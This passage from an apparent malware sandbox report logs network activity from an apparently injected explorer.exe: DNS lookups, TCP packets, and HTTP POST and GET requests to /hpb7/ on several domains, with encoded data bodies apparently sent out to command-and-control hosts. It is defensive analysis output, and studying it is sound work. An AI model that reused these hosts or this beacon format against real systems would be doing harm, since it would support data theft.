                                                          Mar 21, 2023 08:08:19.611190081 CET8049707162.0.231.77192.168.2.3
                                                          Mar 21, 2023 08:08:19.611356020 CET4970780192.168.2.3162.0.231.77
                                                          Mar 21, 2023 08:08:19.611433029 CET4970780192.168.2.3162.0.231.77
                                                          Mar 21, 2023 08:08:19.611999035 CET4970780192.168.2.3162.0.231.77
                                                          Mar 21, 2023 08:08:19.795941114 CET8049707162.0.231.77192.168.2.3
                                                          Mar 21, 2023 08:08:24.784589052 CET4970880192.168.2.3162.241.24.110
                                                          Mar 21, 2023 08:08:24.967809916 CET8049708162.241.24.110192.168.2.3
                                                          Mar 21, 2023 08:08:24.967962027 CET4970880192.168.2.3162.241.24.110
                                                          Mar 21, 2023 08:08:24.968077898 CET4970880192.168.2.3162.241.24.110
                                                          Mar 21, 2023 08:08:25.151055098 CET8049708162.241.24.110192.168.2.3
                                                          Mar 21, 2023 08:08:25.161900043 CET8049708162.241.24.110192.168.2.3
                                                          Mar 21, 2023 08:08:25.161959887 CET8049708162.241.24.110192.168.2.3
                                                          Mar 21, 2023 08:08:25.162038088 CET4970880192.168.2.3162.241.24.110
                                                          Mar 21, 2023 08:08:26.477844000 CET4970880192.168.2.3162.241.24.110
                                                          Mar 21, 2023 08:08:27.492552996 CET4970980192.168.2.3162.241.24.110
                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                          Mar 21, 2023 08:07:24.608470917 CET | 192.168.2.3 | 8.8.8.8 | 0x3abb | Standard query (0) | www.yongleproducts.com | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:07:35.665481091 CET | 192.168.2.3 | 8.8.8.8 | 0xae75 | Standard query (0) | www.0dhy.xyz | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:07:46.422673941 CET | 192.168.2.3 | 8.8.8.8 | 0x93ef | Standard query (0) | www.kunimi.org | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:07:58.808130026 CET | 192.168.2.3 | 8.8.8.8 | 0x395a | Standard query (0) | www.amirah.cfd | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:07:59.838872910 CET | 192.168.2.3 | 8.8.8.8 | 0x60d8 | Standard query (0) | www.amirah.cfd | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:00.867115974 CET | 192.168.2.3 | 8.8.8.8 | 0x1705 | Standard query (0) | www.amirah.cfd | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:05.917721033 CET | 192.168.2.3 | 8.8.8.8 | 0xd3d2 | Standard query (0) | www.bisarropainting.com | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:07.086607933 CET | 192.168.2.3 | 8.8.8.8 | 0x1bc0 | Standard query (0) | www.bisarropainting.com | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:08.308490992 CET | 192.168.2.3 | 8.8.8.8 | 0x2433 | Standard query (0) | www.bisarropainting.com | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:13.337563992 CET | 192.168.2.3 | 8.8.8.8 | 0x26af | Standard query (0) | www.traindic.top | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:24.633847952 CET | 192.168.2.3 | 8.8.8.8 | 0x2381 | Standard query (0) | www.bohndigitaltech.com | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:35.742198944 CET | 192.168.2.3 | 8.8.8.8 | 0xd55e | Standard query (0) | www.rifleroofers.com | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:48.652827978 CET | 192.168.2.3 | 8.8.8.8 | 0x5b9e | Standard query (0) | www.denko-kosan.com | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:09:08.449750900 CET | 192.168.2.3 | 8.8.8.8 | 0xb9d5 | Standard query (0) | www.madliainsalu.com | A (IP address) | IN (0x0001) | false
                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                          Mar 21, 2023 08:06:50.276381016 CET | 8.8.8.8 | 192.168.2.3 | 0x2211 | No error (0) | windowsupdatebg.s.llnwi.net |  | 95.140.230.128 | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:07:24.629987955 CET | 8.8.8.8 | 192.168.2.3 | 0x3abb | No error (0) | www.yongleproducts.com |  | 1.13.186.125 | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:07:35.687676907 CET | 8.8.8.8 | 192.168.2.3 | 0xae75 | No error (0) | www.0dhy.xyz |  | 198.46.160.97 | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:07:46.707103968 CET | 8.8.8.8 | 192.168.2.3 | 0x93ef | No error (0) | www.kunimi.org | kunimi.org |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Mar 21, 2023 08:07:46.707103968 CET | 8.8.8.8 | 192.168.2.3 | 0x93ef | No error (0) | kunimi.org |  | 219.94.129.181 | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:07:58.829898119 CET | 8.8.8.8 | 192.168.2.3 | 0x395a | Name error (3) | www.amirah.cfd | none | none | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:07:59.860487938 CET | 8.8.8.8 | 192.168.2.3 | 0x60d8 | Name error (3) | www.amirah.cfd | none | none | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:00.889214993 CET | 8.8.8.8 | 192.168.2.3 | 0x1705 | Name error (3) | www.amirah.cfd | none | none | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:06.065783024 CET | 8.8.8.8 | 192.168.2.3 | 0xd3d2 | Name error (3) | www.bisarropainting.com | none | none | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:07.286751986 CET | 8.8.8.8 | 192.168.2.3 | 0x1bc0 | Name error (3) | www.bisarropainting.com | none | none | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:08.328178883 CET | 8.8.8.8 | 192.168.2.3 | 0x2433 | Name error (3) | www.bisarropainting.com | none | none | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:13.699300051 CET | 8.8.8.8 | 192.168.2.3 | 0x26af | No error (0) | www.traindic.top |  | 162.0.231.77 | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:24.783422947 CET | 8.8.8.8 | 192.168.2.3 | 0x2381 | No error (0) | www.bohndigitaltech.com | bohndigitaltech.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:24.783422947 CET | 8.8.8.8 | 192.168.2.3 | 0x2381 | No error (0) | bohndigitaltech.com |  | 162.241.24.110 | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:35.790923119 CET | 8.8.8.8 | 192.168.2.3 | 0xd55e | No error (0) | www.rifleroofers.com | rifleroofers.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:35.790923119 CET | 8.8.8.8 | 192.168.2.3 | 0xd55e | No error (0) | rifleroofers.com |  | 67.222.24.48 | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:48.940431118 CET | 8.8.8.8 | 192.168.2.3 | 0x5b9e | No error (0) | www.denko-kosan.com | denko-kosan.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Mar 21, 2023 08:08:48.940431118 CET | 8.8.8.8 | 192.168.2.3 | 0x5b9e | No error (0) | denko-kosan.com |  | 49.212.180.95 | A (IP address) | IN (0x0001) | false
                                                          Mar 21, 2023 08:09:08.493007898 CET | 8.8.8.8 | 192.168.2.3 | 0xb9d5 | No error (0) | www.madliainsalu.com | madliainsalu.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Mar 21, 2023 08:09:08.493007898 CET | 8.8.8.8 | 192.168.2.3 | 0xb9d5 | No error (0) | madliainsalu.com |  | 34.120.137.41 | A (IP address) | IN (0x0001) | false
                                                          • www.yongleproducts.com
                                                          • www.0dhy.xyz
                                                          • www.kunimi.org
                                                          • www.traindic.top
                                                          • www.bohndigitaltech.com
                                                          • www.rifleroofers.com
                                                          • www.denko-kosan.com
                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          0 | 192.168.2.3 | 49698 | 1.13.186.125 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:07:24.914344072 CET | 246 | OUT | GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== HTTP/1.1
                                                          Host: www.yongleproducts.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 21, 2023 08:07:25.192853928 CET | 246 | IN | HTTP/1.1 404 Not Found
                                                          Transfer-Encoding: chunked
                                                          Server: Microsoft-IIS/8.5
                                                          Date: Tue, 21 Mar 2023 07:07:25 GMT
                                                          Connection: close
                                                          Mar 21, 2023 08:07:25.192886114 CET | 246 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          1 | 192.168.2.3 | 49699 | 198.46.160.97 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:07:35.808631897 CET | 247 | OUT | POST /hpb7/ HTTP/1.1
                                                          Host: www.0dhy.xyz
                                                          Connection: close
                                                          Content-Length: 188
                                                          Cache-Control: no-cache
                                                          Origin: http://www.0dhy.xyz
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.0dhy.xyz/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Ascii: bcX3Uv=MpN4BcIXuYXZw41w7wqOuVyOcSvZ0IfYx-pPxZhHbGao~QBcDlvyKQcIxPoFF096qZGSwoYh79QcaBvAaSuxZoMNeSKZhoo45YZCJ9(TkTL56tP4zC7VqkVKkegF0SunbqOIu_FEMoloQWGtM6O7x62PSJTx7EzkT1rxr6crns1RZ0vYaw).
                                                          Mar 21, 2023 08:07:35.927187920 CET | 248 | IN | HTTP/1.1 400 Bad Request
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 21 Mar 2023 07:07:35 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 264
                                                          Connection: close
                                                          Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          10 | 192.168.2.3 | 49708 | 162.241.24.110 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:08:24.968077898 CET | 478 | OUT | POST /hpb7/ HTTP/1.1
                                                          Host: www.bohndigitaltech.com
                                                          Connection: close
                                                          Content-Length: 188
                                                          Cache-Control: no-cache
                                                          Origin: http://www.bohndigitaltech.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.bohndigitaltech.com/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Ascii: bcX3Uv=zSsGdga9al9lRM~luZtBU0tZEMymKO0hwQSW1fncVArea-2xn9(f7NYhnG7ELJjBeSr9A3jMQTzSZYKKoVsi2yWTLEYrfgdpbcHPyDrLaCs0dk(QJlGU(4IdZ7g0vfnvgYZD39Q5CFkPDy1oPW97M_8s4L37LSPCbgY8UqfZF3Z2gV0qaA).
                                                          Mar 21, 2023 08:08:25.161900043 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 21 Mar 2023 07:08:25 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          11 | 192.168.2.3 | 49709 | 162.241.24.110 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:08:27.673937082 CET | 485 | OUT | POST /hpb7/ HTTP/1.1
                                                          Host: www.bohndigitaltech.com
                                                          Connection: close
                                                          Content-Length: 5336
                                                          Cache-Control: no-cache
                                                          Origin: http://www.bohndigitaltech.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.bohndigitaltech.com/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Mar 21, 2023 08:08:27.865915060 CET | 486 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 21 Mar 2023 07:08:27 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          12 | 192.168.2.3 | 49710 | 162.241.24.110 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:08:30.376132011 CET | 486 | OUT | GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ== HTTP/1.1
                                                          Host: www.bohndigitaltech.com
                                                          Connection: close
                                                          Mar 21, 2023 08:08:30.562212944 CET | 487 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 21 Mar 2023 07:08:30 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          13 | 192.168.2.3 | 49711 | 67.222.24.48 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:08:35.936125994 CET | 488 | OUT | POST /hpb7/ HTTP/1.1
                                                          Host: www.rifleroofers.com
                                                          Connection: close
                                                          Content-Length: 188
                                                          Cache-Control: no-cache
                                                          Origin: http://www.rifleroofers.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.rifleroofers.com/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Data Ascii: bcX3Uv=fpdggjRt1rKnivkIA-38wxi0cEnyvFRN4LNxN1pl4HLZb2o3soOCKbfeKY85hjOpZGEZfJIXD46D4OGYOT~RrE1nsShH82uBrmXL4dHI0B9VadrwOTlWRFbey4cdai0kTKlDcTOoB_fKDglE(8oe7KdR~syqBxRerGmbcdp6fqbX9TILuA).
                                                          Mar 21, 2023 08:08:36.190912008 CET | 489 | IN | HTTP/1.1 404 Not Found
                                                          Connection: close
                                                          x-litespeed-tag: 735_HTTP.404
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          content-type: text/html; charset=UTF-8
                                                          link: <https://rifleroofers.com/wp-json/>; rel="https://api.w.org/"
                                                          x-litespeed-cache-control: no-cache
                                                          transfer-encoding: chunked
                                                          content-encoding: gzip
                                                          vary: Accept-Encoding
                                                          date: Tue, 21 Mar 2023 07:08:36 GMT
                                                          server: LiteSpeed


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          14 | 192.168.2.3 | 49712 | 67.222.24.48 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:08:38.577159882 CET | 517 | OUT | POST /hpb7/ HTTP/1.1
                                                          Host: www.rifleroofers.com
                                                          Connection: close
                                                          Content-Length: 5336
                                                          Cache-Control: no-cache
                                                          Origin: http://www.rifleroofers.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.rifleroofers.com/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
I(p3AW0R5Scckiip1dtmdTnVVY9GgFsZIzukoHWzXBjktsVvpMTEsQdfBRSo4U8i2SK(QkPY8Wka9s8l8vqOWFeL9fNQAflURq2G2nk~gxH9XVneBDPMwjftDiNYp4ffWObJt3fSaKu9IfUja6IlUdXyWicthhMxdavuTx94LCyj3cXnnhY64g4VbrXERgwu1hixLvEjscIf6BzFjKStJGOx9mwcdNohoBf8ViDMp2LItj9Wj6ErGotZO2T1XBlN-f4K_UQwnS-cCwe2W2S~Bh2ijzTr97kGzSE6uRe0mTdll(EQvuKGRFqTIACmUXBhjff043sKvTmoZxLFhjRN5tutVCIJPwcvjwyle1xdlnQAIjToCe2KamH~Tt9jSHfQtz0BXlTp8BPPYzXuvinpMbpJzNED0zHkDJlqbUcMcb54W6KGDXpmvxdL8zfuc4SPcx7w2cvbHsuqEOJbVBVWZNoCN8eyACoCxoJ9lFKmHIEFSoZRt1mzK1lQ9bdVpr-AbibyjOu9Nm21oZc(dt403Z9YUsLBahRhkg16inLsPKgeZkmru(hGGMECYnY073nj2hWa4rtS4~MSqSWgmrr1YQ1QrzhQ9jpiAa7ejFERXoGH5tYYP39OTC7QQo6QPLFAJNb~7~U5iRj2Rwc1uQLyNMVPfRbNra9RlbJKHgTE4Ss~mmcLU5x8CKewYBlqGnxMf8lNCI6KLMQGJ6WLxSd8Eqm4rQ1l8RQSeKicjKLMxHYM8gqLepS92zOUl18fbtV2rcPI0RVAaPbDXSv3tmrTIX8w1VTNzQyx9wmtWfDgPithu61c6iBWNTLVsp-udPK5GX_C7ut0ik9eqnU1OhF6w3ehUzGCvKW4wk3H3WSpzPWXQ3uTp~GNj7OfAXPaeakond80PK8t3xtz57V0yvUNpqwDky1k1vMOJoyJ21GJ_m7W9vdZIIeWV7KD92FxseMNqCMzMHutfM2zTKiq-prNBTn8E8QFIey9QMJ3_q4KD(FUI7d0-KNkKrteQBClnkDsg(MKOSJ0nWg6eO8qvNU0_k7MS5pGtGLcTf-ePF7OP0TnF77Eo7RYmPQmBhc0oY410VQMx(TGBsx5Npc0dVnqCM1GAWzfcLfvBj0VRqSdEOWAs3Xkv2Ao31nmuoSAeh-AXm_N_eIbiIvrbkVk10sd0getIvSqhHmKx2JVZXAeWfNKO6wr-bYzqt-QNKTs6c1ntAW6wPdmJqlzTaqLyXo3qcmM-K68IjNrlCCKjBozwBGcrtYrXgu3iXhgOm6sJk2cJisTtDgU4BzVvoEwhPQpEh4KmV9H_kbnRYNRDqqSqjJ1volbo~0oEzfSGXKYgDAGVB1h8OGT45VxiNY5e5UA61IUiITq7Hor9x9WqNb8dvyUbjEzGY3T5fY2DduQZ7hdewlzPLvkwR-eOB7~A9DRvKPq3qOoloJfeWts0tR3vp4(RT7(b7XHKTRYzYSbHwIcUg3SZqi0FcN9bUN8sC-KDTeMiO1kMX9IoNTS1mt9RD3vxzFzvEjj8S9FHrB6LL3zMYmBFixML1C1FldonN19_9TetSFCNyNL7Q4aXHo(BiCZw3pxXQkALgXyIPRx_fv9XvaXOCEsCNsNAH9I88C(WxC~_nRxp4jqUGaJrdNPPHdCaV64snYbPCowQuUwvoUQ0mLTxCBDJHNDaqEBASCdrrx~tOFPA1Qs9A2xl0b8ag2FeKySq7BbeeVCZN4sBoyZNoEPpCa7fz7qQsV6wM8oe9ZGLnnRjjr7eBGOffmb4CrkgItWlUWULcPUVthBTHOZzg81cdgvgZr66bjLM9H~V271PulrH1qjhU_iwrPQ8vGic~G7DLVfgrFfFvtR43eBUArYJK8FCLo4NcD4X5ozE8hby8HAyBCZQTJZ_TGt6cV197Mlu7kIzBACAZ3HR2bxXX4B4kNuwWr5mZTRjvFYiv3OfwOr1WNCwQVj4EEX259ifpcGzeJZeXHARzmXpDktVwKNS0ch7xoG3UrL
rKQH_g8cNgECUMo~0AP(-X50he-cdS5t2vzb2ugzFybdogueTEwZj2wxZECEy(C9n~bm6RjGtWwMpd2iI4bni7q6tsZlLUTLri4WVwRXjd1eiI3Ua~aP-oOWVH75jTaYzVdGyWheZgwynSUlfKxYHrqr45q3
                                                          Mar 21, 2023 08:08:38.834908009 CET | 518 | IN | HTTP/1.1 404 Not Found
                                                          Connection: close
                                                          x-litespeed-tag: 735_HTTP.404
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          content-type: text/html; charset=UTF-8
                                                          link: <https://rifleroofers.com/wp-json/>; rel="https://api.w.org/"
                                                          x-litespeed-cache-control: no-cache
                                                          transfer-encoding: chunked
                                                          content-encoding: gzip
                                                          vary: Accept-Encoding
                                                          date: Tue, 21 Mar 2023 07:08:38 GMT
                                                          server: LiteSpeed


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          15 | 192.168.2.3 | 49713 | 67.222.24.48 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:08:41.218318939 CET | 531 | OUT | GET /hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1
                                                          Host: www.rifleroofers.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 21, 2023 08:08:41.410840988 CET | 532 | IN | HTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          content-type: text/html; charset=UTF-8
                                                          x-redirect-by: WordPress
                                                          location: http://rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X
                                                          x-litespeed-cache: miss
                                                          content-length: 0
                                                          date: Tue, 21 Mar 2023 07:08:41 GMT
                                                          server: LiteSpeed


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          16 | 192.168.2.3 | 49714 | 49.212.180.95 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:08:49.243649960 CET | 533 | OUT | POST /hpb7/ HTTP/1.1
                                                          Host: www.denko-kosan.com
                                                          Connection: close
                                                          Content-Length: 188
                                                          Cache-Control: no-cache
                                                          Origin: http://www.denko-kosan.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.denko-kosan.com/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Mar 21, 2023 08:08:49.543113947 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 21 Mar 2023 07:08:49 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 196
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          17 | 192.168.2.3 | 49715 | 49.212.180.95 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:08:52.062103033 CET | 539 | OUT | POST /hpb7/ HTTP/1.1
                                                          Host: www.denko-kosan.com
                                                          Connection: close
                                                          Content-Length: 5336
                                                          Cache-Control: no-cache
                                                          Origin: http://www.denko-kosan.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.denko-kosan.com/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Mar 21, 2023 08:08:52.362633944 CET | 540 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 21 Mar 2023 07:08:52 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 196
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          18 | 192.168.2.3 | 49716 | 49.212.180.95 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:08:55.578836918 CET | 541 | OUT | GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ== HTTP/1.1
                                                          Host: www.denko-kosan.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Mar 21, 2023 08:08:55.886961937 CET | 541 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 21 Mar 2023 07:08:55 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 196
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          2 | 192.168.2.3 | 49700 | 198.46.160.97 | 80 | C:\Windows\explorer.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Mar 21, 2023 08:07:38.452894926 CET | 254 | OUT | POST /hpb7/ HTTP/1.1
                                                          Host: www.0dhy.xyz
                                                          Connection: close
                                                          Content-Length: 5336
                                                          Cache-Control: no-cache
                                                          Origin: http://www.0dhy.xyz
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.0dhy.xyz/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Mar 21, 2023 08:07:38.571118116 CET | 255 | IN | HTTP/1.1 400 Bad Request
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 21 Mar 2023 07:07:38 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 264
                                                          Connection: close
                                                          Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                                                          Mar 21, 2023 08:07:38.571203947 CET | 256 | OUT | POST /hpb7/ HTTP/1.1
                                                          Host: www.0dhy.xyz
                                                          Connection: close
                                                          Content-Length: 5336
                                                          Cache-Control: no-cache
                                                          Origin: http://www.0dhy.xyz
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://www.0dhy.xyz/hpb7/
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
